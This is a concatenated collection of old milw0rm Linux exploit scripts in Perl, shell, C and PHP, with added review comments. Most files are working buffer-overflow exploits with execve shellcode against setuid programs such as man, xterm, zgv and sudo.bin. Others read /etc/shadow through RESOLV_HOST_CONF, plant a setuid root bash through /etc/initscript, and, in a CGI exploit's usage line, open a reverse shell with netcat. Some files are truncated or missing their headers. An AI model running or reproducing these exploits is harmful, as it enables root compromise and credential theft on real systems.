## Greets: scrippie, *@HWA, grazer, mixter, pr0ix, s\
## http://www.digit-labs.org/ || http://teleh0r.cjb.net/


# Classic i386 Linux execve("/bin/sh") shellcode (int $0x80), annotated inline.
$shellcode =
"\xeb\x1f". #/* jmp 0x1f */
"\x5e". #/* popl %esi */
"\x89\x76\x08". #/* movl %esi,0x8(%esi) */
"\x31\xc0". #/* xorl %eax,%eax */
"\x88\x46\x07". #/* movb %eax,0x7(%esi) */
"\x89\x46\x0c". #/* movl %eax,0xc(%esi) */
"\xb0\x0b". #/* movb $0xb,%al */
"\x89\xf3". #/* movl %esi,%ebx */
"\x8d\x4e\x08". #/* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c". #/* leal 0xc(%esi),%edx */
"\xcd\x80". #/* int $0x80 */
"\x31\xdb". #/* xorl %ebx,%ebx */
"\x89\xd8". #/* movl %ebx,%eax */
"\x40". #/* inc %eax */
"\xcd\x80". #/* int $0x80 */
"\xe8\xdc\xff\xff\xff". #/* call -0x24 */
"/bin/sh"; #/* .string \"/bin/sh\" */


# $ret is a fixed stack guess for the tested box; $nop is 'A' (0x41, inc %ecx)
# used as a harmless sled byte.  Layout built below: 'A', $len bytes of
# return address, then ($egg - shellcode) 'A's and the shellcode above them.
$ret = 0xbfffef96;
$egg = 500;
$len = 208;
$nop = 'A';

# No argument leaves $offset undefined, which numifies to 0 (no strict/-w here).
if (@ARGV == 1) {
$offset = $ARGV[0];
}

if (!($ENV{'DISPLAY'})) {
die("Error: the shell variable DISPLAY is not set.\n");
}

$buffer .= $nop;
$new_ret = pack('l',($ret + $offset));

print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
sleep(1);

for ($i = 0; $i < $len; $i += 4) {
$buffer .= pack('l',($ret + $offset));
}

for ($i = 0; $i < ($egg - length($shellcode)); $i++) {
$buffer .= $nop;
}

$buffer .= $shellcode;

# seyon uses X, so if there is no X server running, or you
# are not allowed to connect to it, start X on your machine,
# and using xhost, allow the target to connect to your server,
# then: export DISPLAY=your-ip:0.0 - and execute the exploit.

# NOTE(review): the buffer is interpolated into a shell command line, so any
# address/offset producing a NUL, `"`, `$` or backtick byte will truncate or
# mangle the argument before seyon sees it.
exec("/usr/X11R6/bin/seyon -noemulator \"$buffer\"");


# milw0rm.com [2001-01-15]
--------------------------------------------------------------------------------
/linux/linux_exploits/255.pl:
--------------------------------------------------------------------------------
#!/usr/bin/perl

## Redhat 6.1 man exploit - gives egid 15
## Written just for fun - teleh0r@doglover.com


$shellcode = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";


$len = 4062; # -- Sufficient to overwrite EIP.
$nop = "\x90"; # -- x86 NOP.
$ret = 0xbfffbb24; # -- ESP / Return value.
$offset = -800; # -- Default offset to try.


if (@ARGV == 1) {
$offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}

# [ Buffer: NNNNNNNNNNNNNN ]

# Add the shellcode to the buffer.

$buffer .= $shellcode;

# [ Buffer: NNNNNNNNNNNNNNSSSSS ]

$address = sprintf('%lx', ($ret + $offset));
$new_ret = pack('l', ($ret + $offset));

print("Address: 0x$address / Offset: $offset\n");
sleep(1);

# Fill the rest of the buffer (length 100) with RET's.

for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}

# [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ]

# NOTE(review): the overflow is in the sgid-man binary's handling of the
# MANPAGER environment variable; the payoff is only the man group (gid 15
# per the header), not root.  Any page works -- "id" is just a short one.
local($ENV{'MANPAGER'}) = $buffer; exec("/usr/bin/man id");


# milw0rm.com [2001-01-19]
--------------------------------------------------------------------------------
/linux/linux_exploits/257.pl:
--------------------------------------------------------------------------------
#!/usr/bin/perl

## jaZip Exploit / Tested version: jaZip-0.32-2 / anno 2000
## || http://teleh0r.cjb.net/
## Vulnerable: Turbolinux 6.0
##
## [teleh0r@localhost teleh0r]$ rpm -q jaZip
## jaZip-0.32-2
## [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
## Address: 0xbffff7ac
## bash#


$shellcode = # Shellcode by: Taeho Oh
"\xeb\x1f". #/* jmp 0x1f */
"\x5e". #/* popl %esi */
"\x89\x76\x08". #/* movl %esi,0x8(%esi) */
"\x31\xc0". #/* xorl %eax,%eax */
"\x88\x46\x07". #/* movb %eax,0x7(%esi) */
"\x89\x46\x0c". #/* movl %eax,0xc(%esi) */
"\xb0\x0b". #/* movb $0xb,%al */
"\x89\xf3". #/* movl %esi,%ebx */
"\x8d\x4e\x08". #/* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c". #/* leal 0xc(%esi),%edx */
"\xcd\x80". #/* int $0x80 */
"\x31\xdb". #/* xorl %ebx,%ebx */
"\x89\xd8". #/* movl %ebx,%eax */
"\x40". #/* inc %eax */
"\xcd\x80". #/* int $0x80 */
"\xe8\xdc\xff\xff\xff". #/* call -0x24 */
"/bin/sh"; #/* .string \"/bin/sh\" */


$ret = 0xbffff7ac; # May have to be modified.
$len = 2100;
$nop = 'A';

# No argument leaves $offset undefined (numifies to 0; no strict/-w here).
if (@ARGV == 1) {
$offset = $ARGV[0];
}

for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) {
$buffer .= $nop;
}

$buffer .= $shellcode;

print("Address: 0x", sprintf('%lx',($ret + $offset)), "\n");
$new_ret = pack('l',($ret + $offset));
# Alignment pad; it is not counted in $i, so the buffer ends up 3 bytes over $len.
$buffer .= $nop x 3; # May have to be modified / 5 for Debian.

for ($i += length($shellcode); $i < $len; $i += 4) {
$buffer .= $new_ret;
}

if ($ENV{'DISPLAY'}) {
delete($ENV{'DISPLAY'});
}

# The overflow is reached through the DISPLAY environment variable of the
# setuid jazip binary (no X connection is needed for the crash).
local($ENV{'DISPLAY'}) = $buffer;
exec("/usr/X11R6/bin/jazip");


# milw0rm.com [2001-01-25]
--------------------------------------------------------------------------------
/linux/linux_exploits/258.sh:
--------------------------------------------------------------------------------
# Charles Stevenson
# glibc-2.2 and openssh-2.3.0p1 (Debian 2.3 , Redhat 7.0)
# This exploits is for glibc >= 2.1.9x.
# (****krochos@linuxmail.org****)
# Edit this if you have a problem with path
#
# NOTE(review): glibc 2.2-era resolver honouring RESOLV_HOST_CONF inside a
# setuid program (tracked as CVE-2001-0170; the 1996 version of the same
# trick is 317.txt in this tree).  The resolver reads the named file as
# root and echoes the lines it cannot parse in its error output, which is
# what the cut/awk pipeline at the end extracts.  The pipeline's field
# choices depend on that exact message format.

ssh=/usr/bin/ssh
traceroute=/usr/sbin/traceroute
FILE=/etc/shadow # File to read
###############################################################################

echo "$ssh"
echo "[*] Checking permisions..."

# BUG: if ssh is not setuid but traceroute is, this only skips the exit --
# the script still runs `ssh` below; $traceroute is never actually used.
if [ ! -u $ssh ]; then
echo "$ssh is NOT setuid on this system or does not exist at all!"
if [ ! -u $traceroute ]; then
echo "$traceroute is NOT setuid on this system or does not exist at all!"
exit 0
fi
fi

export RESOLV_HOST_CONF=$FILE

echo "[*] Glibc bug found by Charles Stevenson "
echo "[*] krochos@linuxmail.org"
sleep 1
echo "[*] export RESOLV_HOST_CONF=/etc/shadow"
# /tmp/.resolv receives the raw stderr (shadow contents included), is created
# with the caller's umask and is never deleted -- clean it up.
ssh lt 2>/tmp/.resolv
cat /tmp/.resolv | cut -d"\`" -f5,2 | awk -F"\'" '{print $1} '

# milw0rm.com [2001-01-25]
--------------------------------------------------------------------------------
/linux/linux_exploits/273.c:
--------------------------------------------------------------------------------
/*
 * 0x3142-sq-chpasswd.c
 * Squirremail chpasswd buffer overflow.
 *
 * Tested on SuSE 9.
 * The bug was found by Matias Neiff
 * Coded by x314 <0x3142 hushmail.com>
 * (c) 2004 Copyright by x314.
 * All Rights Reserved.
 *
 * Greets: m0s krewz.
 *
 */

/* NOTE(review): the header name after #include was lost in rendering, as
 * was the <path> placeholder in the usage string below. */
#include

/* setreuid(0,0) (xor ebx/ecx, al=0x46, int $0x80) followed by the usual
 * execve("/bin/sh") stub, so the shell keeps uid 0. */
char shellcode[]=
"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
"\x68";

/* argv[1] = path of the setuid chpasswd helper.  The shellcode is passed as
 * the target's only environment string and its address is computed from the
 * 32-bit stack top (0xbffffffa minus the exec filename and the env string),
 * so this assumes no ASLR and the classic i386 layout. */
int main(int argc, char *argv[])
{
char *env[2] = {shellcode, NULL};
int i;
long ret, *addr_ptr;
char *buffer, *ptr;

buffer = malloc(200);

printf("\n*** Squirremail chpasswd local root exploit by 0x3142@hushmail.com ***\n\n");

if(argc != 2) {
printf("Usage: %s \n\n",argv[0]);
exit(0);
}

ret = 0xbffffffa - strlen(shellcode) - strlen(argv[1]);

// printf("Using ret = 0x%x\n\n", ret);

/* 200 bytes of the return address; the last byte is NUL-terminated so the
 * argument string is 199 bytes long. */
ptr = buffer;
addr_ptr = (long *) ptr;
for(i=0; i < 200; i+=4)
{
*(addr_ptr++) = ret;
}

buffer[200-1] = 0;

execle(argv[1], "chpasswd", buffer, "0x314", "m0s", 0, env);

/* only reached if execle() fails */
free(buffer);

return 0;
}




// milw0rm.com [2004-04-20]
--------------------------------------------------------------------------------
/linux/linux_exploits/285.c:
--------------------------------------------------------------------------------
/*
Slackware 7.1 /usr/bin/Mail Exploit give gid=1 ( bin )
if /usr/bin/Mail is setgid but it is not setgid,
setuid for default.

tested on my box ( sl 7.1 )
crazy exploited by kengz.
GID.... \x01 = 1 (bin)
\x02 = 2 ,
\x03 = 3 ,
... \x0a = 10
\x0b = 11
....
*/

/* NOTE(review): header names after #include were lost in rendering.  Note
 * that GID is set to "\x03" here, not the "\x01" (bin) the header talks
 * about; the byte is spliced into two setregid-style syscalls (al=0x47):
 * first (-1, GID), then (GID, GID), before the execve("/bin/sh") stub. */
#include
#include
#define GID "\x03"

int main(int argc, char **argv) {
char shellcode[] =
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31"
"\xc0\xb0\x47\xcd\x80\x31\xdb\x31\xc9\xb3"GID"\xb1"
GID"\x31\xc0\xb0\x47\xcd\x80\xeb\x1f\x5e\x89\x76"
"\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89"
"\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89"
"\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";

char buf2[10000];
char buffer[15000];
char nop[8000];
char *p, *q;
long ret=0xbfffffff;
int len, offset = 0, i,j,k,ii;
ret = ret - 5000;

/* 2000 bytes of return address; buf2 is never NUL-terminated, so the %s
 * below reads whatever uninitialised stack follows byte 2000. */
for(k=0; k<2000; k+=4)
*(long *)&buf2[k] = ret;

/* BUG: nop[] is never initialised before the first strcat(), so this relies
 * on nop[0] happening to be 0 (undefined behaviour); it is also quadratic. */
for(k=0;k<7000;k++){
strcat(nop,"\x90");
}
snprintf(buffer,12000,"%s%s%s",nop,shellcode,buf2);
printf("Crazy Mail sploit by kengz \n");
/* Presumably Mail's end-of-message marker, which the user must type. */
printf("Hit ' . ' to go \n");
/* The oversized buffer is passed as the -c (carbon copy) argument. */
execl("/usr/bin/Mail","Mail","x","-s","x","-c",buffer,0);
}


// milw0rm.com [2001-03-03]
--------------------------------------------------------------------------------
/linux/linux_exploits/290.sh:
--------------------------------------------------------------------------------
#!/bin/tcsh
# example of exploiting the LD_PRELOAD hole
# shadow (tested on redhat 6.0, should work on others)
#
# NOTE(review): ld.so only honours LD_PRELOAD in a setuid program for
# slash-free names found in the standard library directories, which is why
# glibc's own libSegFault.so is preloaded from /lib (hence the `cd /lib`).
# libSegFault writes its crash report to $SEGFAULT_OUTPUT_NAME -- here
# /etc/initscript -- with the privileges of the crashing setuid userhelper
# and the umask 0 set below, so the file comes out root-owned and
# world-writable.  sysvinit sources /etc/initscript for every process it
# spawns, so whatever replaces it runs as root on the next getty respawn.
# The messages printed below are Polish; translations are in the comments.

# "warning: /etc/initscript exists" -- the payload below would clobber it
if ( -e /etc/initscript ) echo uwaga: /etc/initscript istnieje
cd /lib
umask 0
setenv LD_PRELOAD libSegFault.so
setenv SEGFAULT_OUTPUT_NAME /etc/initscript
# "wait... this may take a while"
echo czekaj... to moze chwile potrwac...
# Keep launching userhelper and SIGSEGVing it until the report file appears.
# `killall -11 userhelper` hits every userhelper on the box, not just ours.
while (! -e /etc/initscript )
( userhelper >& /dev/null & ; killall -11 userhelper >& /dev/null ) > /dev/null
end

# "created the initscript file"
echo utworzylem plik initscript

# Replace the crash report with a script init will run as root: it drops a
# setuid+setgid root copy of bash in /var/tmp and removes itself.  Until init
# next spawns something the host's initscript is this payload, and a mistake
# here can stop logins working.  bash 2.x and later drop the effective uid
# unless started with -p, so the copy may need to be run as `.nothing -p`.
cat > /etc/initscript << _init_
cp /bin/bash /var/tmp/.nothing
chmod 6755 /var/tmp/.nothing
rm /etc/initscript
_init_

# "and even replaced it"
echo i nawet go podmienilem

# milw0rm.com [2001-03-04]
--------------------------------------------------------------------------------
/linux/linux_exploits/3154.c:
--------------------------------------------------------------------------------
/* GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
 * ========================================================
 * Multiple overflow conditions occur within mbse-bbs versions 0.70.0 & below.
 * The current version of mbse-bbs does not contain these weaknesses.
 * Exploitation of these vulnerabilities can facilitate a privilege escalation
 * attack in which an unprivileged user becomes root. Exploit calculates
 * return address where ASLR is not in use. Vulnerable code is shown below;
 *
 * matthew@localhost ~/foo/mbsebbs-0.70.0/unix $ cat -n mbuseradd.c
 * ...
 * 177 shell = calloc(PATH_MAX, sizeof(char));
 * ...
 * 228 sprintf(shell, "%s/bin/mbsebbs", getenv("MBSE_ROOT"));
 *
 * (heap corruption in 0.33.17/stack overflow in others).
 * *** glibc detected *** free(): invalid next size (normal): 0x0804e068 ***
 *
 * Example Usage.
 * matthew@localhost ~ $ id
 * uid=1000(matthew) gid=100(users) groups=10(wheel),100(users)
 * matthew@localhost ~ $ ./prdelka-vs-GNU-mbsebbs /opt/mbse/bin/mbuseradd
 * [ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit
 * [ Using return address 0xbfffefd8
 * sh-3.1# id
 * uid=0(root) gid=1(bin) groups=10(wheel),100(users)
 *
 * - prdelka
 */
/* NOTE(review): header names after #include were lost in rendering. */
#include
#include

/* 11 NOPs of slack, then the usual push "//sh","/bin" execve stub. */
char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x31\xc0\x50\x68""//sh""\x68""/bin""\x89\xe3"
"\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/* argv[1] = path of the setuid mbuseradd.  The overflow is an unbounded
 * sprintf of $MBSE_ROOT into a PATH_MAX buffer (see header), so the single
 * environment string "MBSE_ROOT=" + 4061 'A' + 4-byte return address is the
 * whole attack; the shellcode travels as argv[4] of the target. */
int main(int argc,char* argv[]) {
int i;
long eip = 0x41414141;
char envh[]="MBSE_ROOT=";
printf("[ GNU/Linux mbse-bbs 0.70.0 & below stack overflow exploit\n");
if(argc < 2) {
printf("Error: [path]\n");
exit(0);
}
char* buffer = malloc(strlen(envh) + 4085 + sizeof(eip));
strcpy(buffer,envh);
long ptr = (long)buffer;
for(i = 1;i <= 4061;i++){
strncat(buffer,"A",1);
}
/* Offset 4061 is measured from the start of "MBSE_ROOT=", i.e. 4051 bytes
 * into the padding.  The first memcpy of the 0x41414141 placeholder is
 * redundant: it is overwritten by the computed value right after. */
ptr = ptr + 4061;
memcpy((char*)ptr,(char*)&eip,4);
/* Return address derived from the 32-bit stack top, assuming no ASLR and
 * the classic i386 layout: exec filename (argv[1]) highest, then the single
 * env string, then argv[4] (the shellcode) directly below it. */
eip = 0xc0000000 -4 -strlen(argv[1]) -1 -strlen(buffer) -1 -strlen(shellcode) -1;
memcpy((char*)ptr,(char*)&eip,4);
char *env[] = {buffer,NULL};
printf("[ Using return address 0x%x\n",eip);
execle(argv[1],argv[1],"x","x","x",shellcode,NULL,env);
/* exit(0) here reports a failed execle() as success. */
exit(0);
}

// milw0rm.com [2007-01-18]
--------------------------------------------------------------------------------
/linux/linux_exploits/317.txt:
--------------------------------------------------------------------------------
setenv RESOLV_HOST_CONF /etc/shadow; ping adfas

# milw0rm.com [1996-01-01]
--------------------------------------------------------------------------------
/linux/linux_exploits/319.c:
--------------------------------------------------------------------------------
/* NOTE(review): header names after #include were lost in rendering
 * (u_long/u_char come from <sys/types.h>).  The attack passes an oversized
 * NLSPATH to the setuid sudo.bin; current glibc treats NLSPATH as an unsafe
 * variable and ignores it in setuid (AT_SECURE) processes. */
#include
#include
#include
#include
#include

#define PATH_SUDO "/usr/bin/sudo.bin"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

/* Returns the caller's %esp by leaving it in %eax -- relies on the compiler
 * not clobbering %eax before return (breaks under optimisation). */
u_long get_esp()
{
__asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
/* execve("/bin/sh") shellcode; 0x1234561b ^ 0x12345610 = 0xb (execve) is
 * computed that way to avoid a NUL byte in the syscall number. */
u_char execshell[] =
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

int i;
int ofs = DEFAULT_OFFSET;

buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;

/* fill start of buffer with nops */

memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
ptr += BUFFER_SIZE-strlen(execshell);

/* stick asm code into the buffer */

for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];

/* Two copies of the guessed return address (this process's %esp + ofs,
 * not the target's), then a terminating NUL. */
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;

printf("SUDO.BIN exploit coded by _PHANTOM_ 1997\n");
setenv("NLSPATH",buff,1);
execl(PATH_SUDO, "sudo.bin","bash", NULL);
}



// milw0rm.com [1996-02-13]
--------------------------------------------------------------------------------
/linux/linux_exploits/320.pl:
--------------------------------------------------------------------------------
#!/usr/bin/suidperl -U
# NOTE(review): suidperl was the setuid-root helper old Perl used for setuid
# scripts; -U is its "allow unsafe operations" switch (it downgrades the
# fatal taint checks for setuid scripts to warnings).  The script resets
# PATH, then sets the effective ($>) and real ($<) uid to 0 and execs bash --
# which only succeeds when suidperl is running this script with root
# privileges, i.e. the historical bug this file targets.  suidperl was
# removed entirely in Perl 5.12.
$ENV{PATH}="/bin:/usr/bin";
$>=0;$<=0;
exec("/bin/bash");


# milw0rm.com [1996-06-01]
--------------------------------------------------------------------------------
/linux/linux_exploits/322.c:
--------------------------------------------------------------------------------
/* NOTE(review): header names after #include were lost in rendering.
 * The shellcode below uses syscall 59 (mov $0x3b,%al) and an lcall $7,$0
 * gate ("\x9a...\x07"), which is the BSD execve convention rather than
 * Linux's int $0x80 -- so despite living under linux_exploits this appears
 * to target a BSD-style xterm build. */
#include
#include
#include

#define DEFAULT_OFFSET 0
#define BUFFER_SIZE 1491

/* %esp returned via %eax; relies on the compiler leaving %eax untouched. */
long get_esp(void)
{
__asm__("movl %esp,%eax\n");
}

/* argv[1] = offset added to %esp, argv[2] = buffer size (default 1491). */
main(int argc, char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;

char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2"
"\x89\x56\x07" "\x89\x56\x0f" "\x89\x56\x14" "\x88\x56\x19" "\x31\xc0"
"\xb0\x3b" "\x8d\x4e\x0b" "\x89\xca" "\x52" "\x51" "\x53" "\x50"
"\xeb\x18"
"\xe8\xd8\xff\xff\xff" "/bin/sh" "\x01\x01\x01\x01" "\x02\x02\x02\x02"
"\x03\x03\x03\x03" "\x9a\x04\x04\x04\x04\x07\x04";

int i, ofs=DEFAULT_OFFSET, bs=BUFFER_SIZE;

if(argc>1)
ofs=atoi(argv[1]);
if(argc>2)
bs=atoi(argv[2]);
printf("Using offset of esp + %d (%x)\nBuffer size %d\n",
ofs, get_esp()+ofs, bs);

/* BUG: bs comes straight from argv[2] and is never checked against the
 * 4096-byte allocation, so a large value overflows this program's own heap. */
buff = malloc(4096);
if(!buff)
{
printf("can't allocate memory\n");
exit(0);
}
ptr = buff;
memset(ptr, 0x90, bs-strlen(execshell));
ptr += bs-strlen(execshell);
for(i=0;i < strlen(execshell);i++)
*(ptr++) = execshell[i];
/* two copies of the guessed return address, then NUL */
addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_esp() + ofs;
ptr = (char *)addr_ptr;
*ptr = 0;
/* overflow is in xterm's handling of the -fg colour argument */
execl("/usr/X11R6/bin/xterm", "xterm", "-fg", buff, NULL);
}


// milw0rm.com [1996-08-24]
--------------------------------------------------------------------------------
/linux/linux_exploits/331.c:
--------------------------------------------------------------------------------
/*

cxterm buffer overflow exploit for Linux. This code is tested on
both Slackware 3.1 and 3.2.

Ming Zhang
mzhang@softcom.net
*/
/* NOTE(review): header names after #include were lost in rendering. */
#include
#include
#include
#include

#define CXTERM_PATH "/usr/X11R6/bin/cxterm"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

#define NOP_SIZE 1
char nop[] = "\x90";
/* classic i386 Linux execve("/bin/sh") stub */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* %esp returned via %eax; relies on the compiler leaving %eax untouched. */
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}

/* argv[1] = optional offset added to %esp (default 50).  `void main` is
 * non-standard but harmless here. */
void main(int argc,char **argv)
{
char *buff = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
int i,OffSet = DEFAULT_OFFSET;

/* use a different offset if you find this program doesn't do the job */
if (argc>1) OffSet = atoi(argv[1]);

buff = malloc(2048);
if(!buff)
{
printf("Buy more RAM!\n");
exit(0);
}
ptr = buff;

/* `<=` writes one NOP more than BUFFER_SIZE - shellcode - NOP_SIZE;
 * total stays well inside the 2048-byte allocation. */
for (i = 0; i <= BUFFER_SIZE - strlen(shellcode) - NOP_SIZE;
i+=NOP_SIZE) {
memcpy (ptr,nop,NOP_SIZE);
ptr+=NOP_SIZE;
}

for(i=0;i < strlen(shellcode);i++)
*(ptr++) = shellcode[i];

addr_ptr = (long *)ptr;
for(i=0;i < (8/4);i++)
*(addr_ptr++) = get_sp() + OffSet;
ptr = (char *)addr_ptr;
*ptr = 0;
/* NOTE(review): this format string contains a literal line break inside
 * the quotes; old compilers accepted that, current ones reject it with
 * "missing terminating \" character". */
(void) fprintf(stderr,
"This bug is discovered by Ming Zhang
(mzhang@softcom.net)\n");
/* Don't need to set ur DISPLAY to exploit this one, cool huh? */
execl(CXTERM_PATH, "cxterm", "-xrm",buff, NULL);
}

// milw0rm.com [1997-05-14]
--------------------------------------------------------------------------------
/linux/linux_exploits/3384.c:
--------------------------------------------------------------------------------
/*
:: Kristian Hermansen ::
Date: 20070229
Description: Local attacker can influence Apache to direct commands
into an open tty owned by user who started apache process, usually root.
This results in arbitrary command execution.
Affects: Apache 1.3.33/1.3.34 on Debian Stable/Testing/Unstable/Experimental and Ubuntu Warty (4.10)/Hoary (5.04)/Breezy (5.10)/Dapper (6.06)
Edgy (6.10), Feisty (7.04).
Notes: Must have CGI execution privileges and
service started manually by root via shell.
Also try adding "Options +ExecCGI" to your .htaccess file.
Compile: gcc -o /path/to/cgi-bin/cgipwn cgipwn.c
Usage: nc -vvv -l -p 31337
http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d
u53l355 gr33t5: yawn, jellyfish, phzero, pegasus, b9punk, phar, shardy,
benkurtz, ... and who could forget ... setient (the gremlin)!!
*/

/* NOTE(review): TIOCSTI "typed input" injection.  It only works when the
 * CGI inherits a controlling terminal, i.e. the daemon was started from an
 * interactive root shell and never detached (the date above, 20070229, is
 * not a real date).  Header names after #include were lost in rendering
 * (<fcntl.h> for open, <sys/ioctl.h> for TIOCSTI are the obvious ones).
 * Mitigations: start services from init so there is no tty to inject into;
 * newer Linux kernels (6.2+) can disable TIOCSTI via the
 * dev.tty.legacy_tiocsti sysctl. */
#include
#include

/* Apache passes an `=`-free query string to a CGI as argv words, which is
 * why the usage URL uses %20 rather than `+`; the trailing %0d is the CR
 * that "presses Enter" on the tty.  argv[1] is not checked, so a request
 * with no query (or one containing `=`) dereferences NULL; open()'s result
 * is not checked either, so without a tty the ioctls just fail silently. */
int main(int argc, char *argv[]) {
int pts = open("/dev/tty",O_RDONLY);
while(*argv[1] != '\0') {
ioctl(pts,TIOCSTI,argv[1]);
argv[1]++;
}
return 0;
}

// milw0rm.com [2007-02-28]
--------------------------------------------------------------------------------
/linux/linux_exploits/339.c:
--------------------------------------------------------------------------------
/*
 *
 * zgv exploit coded by BeastMaster V on June 20, 1997
 *
 * USAGE:
 * For some strage reason, the filename length of this
 * particular exploit must me one character long, otherwise you
 * will be drop into a normal unpriviledged shell. Go Figure....
 *
 * $ cp zgv_exploit.c n.c
 * $ cc -o n n.c
 * $ ./n
 * Oak driver: Unknown chipset (id = 0)
 * bash#
 *
 * EXPLANATION: zgv (suid root) does not check bounds for $HOME env.
 * TEMPORARY FIX: chmod u-s /usr/bin/zgv
 * NOTE: Don't forget to visit http://www.rootshell.com for more exploits.
 * DISCLAIMER: Please use this in a responsible manner.
 *
 */

/* NOTE(review): header names after #include were lost in rendering.
 * The "one-character filename" quirk above has a mundane cause: the return
 * address is get_sp() - 4675, i.e. relative to THIS process's stack, whose
 * position shifts with the length of its own argv[0]/exec filename, while
 * the target is always exec'd with the fixed argv[0] "/usr/bin/zgv". */
#include
#include
#include

/* geteuid() (al=0x31) then setuid(euid) (al=0x17) so the shell keeps uid 0;
 * the push/call *%esp pair is a get-PC trick, after which the code scans
 * for the "/bin/sh" string and calls execve (al=0x0b). */
char *shellcode =
"\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
"\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
"\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
"\xcd\x80/"
"/bin/sh"
"0";

/* %esp returned via %eax; relies on the compiler leaving %eax untouched. */
char *get_sp() {
asm("movl %esp,%eax");
}

#define bufsize 4096
char buffer[bufsize];

/* Builds HOME = [512 NOPs][shellcode][return addresses ...] and execs the
 * setuid zgv, which copies $HOME into a fixed-size buffer unchecked. */
main() {
int i;

for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() -4675;

memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));

buffer[bufsize - 1] = 0;

setenv("HOME", buffer, 1);

execl("/usr/bin/zgv", "/usr/bin/zgv", NULL);
}

// milw0rm.com [1997-06-20]
--------------------------------------------------------------------------------
/linux/linux_exploits/3427.php:
--------------------------------------------------------------------------------
# NOTE(review): everything from `<?php` to line 56 of this file was stripped
# when the listing was rendered; only the tail below survived and it is not
# runnable as shown.  What remains walks memory in 1024-byte steps and
# serves whatever was collected in $keydata as a download named server.der,
# so this appears to be one of the March-2007 PHP memory-read PoCs that
# pull key material out of the web server process.
0)
break;
}
}
$offset += 1024;
}

header("Content-type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"server.der\"");
echo $keydata;
?>

# milw0rm.com [2007-03-07]
--------------------------------------------------------------------------------
/linux/linux_exploits/3440.php:
--------------------------------------------------------------------------------
# NOTE(review): the body of this file (lines 1-45) was lost in rendering;
# only the trailer survived.


# milw0rm.com [2007-03-09]
